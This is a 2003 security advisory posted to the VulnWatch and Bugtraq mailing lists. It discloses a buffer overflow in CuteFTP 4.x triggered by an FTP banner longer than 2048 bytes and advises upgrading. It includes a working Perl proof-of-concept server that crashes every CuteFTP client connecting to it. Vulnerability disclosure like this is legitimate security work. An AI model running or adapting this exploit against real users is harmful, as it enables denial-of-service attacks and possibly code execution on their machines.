[VulnWatch] CuteFTP: buffer overflow

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

  • Next message: D4rkGr3y: "[VulnWatch] EServ/2.97 remote DoS"
    Date: Sat, 4 Jan 2003 05:01:26 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: CuteFTP client
    #Authors: GlobalSCAPE Inc. [www.globalscape.com]
    #Vulnerable versions: v.4.*
    #Vulnerability: buffer overflow
    #####################################################*

    #Overview#--------------------------------------------------------------#
    "CuteFTP is a Windows based File Transfer Protocol (FTP) client that
    allows users to utilize the capabilities of FTP without having to
    know all the details of the protocol itself. CuteFTP simplifies FTP
    by offering a user-friendly Windows interface instead of a cumbersome
    command line utility. CuteFTP gives novice PC users the ability to
    upload, download and edit files on remote FTP servers around the world."

    #Problem#---------------------------------------------------------------#
    It's possible to crash CuteFTP (and run shellcode(?)) by sending
    long (>2048b) ftp-banner to it. As u understand, this problem could
    be used by FTP server.

    #Fix#--------------------------------------------------------------------#
    Download new verion from www.globalscape.com.

    #Exploit#----------------------------------------------------------------#

    #!/usr/bin/perl
    ######################################################
    #Here is an example of ftp-server. It will freeze each
    #CuteFTP-user, that try to connect to it.
    #######################################################
    use IO::Socket;
    $port = "21";
    $data = "a";
    $num = "2049";
    $buf .= $data x $num;
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     print $client "$buf";
     print "OK\n";
     close($client);
    }
    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981